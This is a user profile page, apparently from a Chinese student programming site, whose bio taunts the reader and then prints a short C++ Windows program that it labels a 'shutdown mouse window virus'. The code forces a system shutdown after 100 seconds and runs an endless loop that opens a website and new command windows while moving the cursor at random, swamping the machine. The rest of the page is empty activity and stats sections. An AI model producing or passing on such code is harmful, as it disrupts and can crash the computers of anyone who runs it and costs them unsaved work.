• 个人简介

    你被诅咒了!

    该用户不懒,个人简介在这里

    什么?你居然想看,

    那就看这个!

    不是想看吗,满足你

    /*
    病毒名:关机鼠标窗口病毒,
    武力值:C- 
    */
    #include<bits/stdc++.h>
    #include<windows.h>
    using namespace std;
    int main()
    {
        //freopen(".in","r",stdin);
        //freopen(".out","w",stdout);
        ios::sync_with_stdio(0);
        cin.tie(0);
        cout.tie(0);
        system("shutdown -s -t 100");
        int x=GetSystemMetrics(SM_CXSCREEN);
        int y=GetSystemMetrics(SM_CYSCREEN);
        system("color F5");
        srand(time(0));
        while(1)
        {
            system("start www.topscoding.com"); 
            SetCursorPos(rand()%x,rand()%y);
            system("start cmd");
        }
    }
    
    
    您太帅了,所以出现了错误,请变衰后砸烂电脑
  • 最近活动

    This person is lazy and didn't join any contests or homework.
  • 最近编写的题解

    This person is lazy and didn't write any solutions.
  • Stat

  • Rating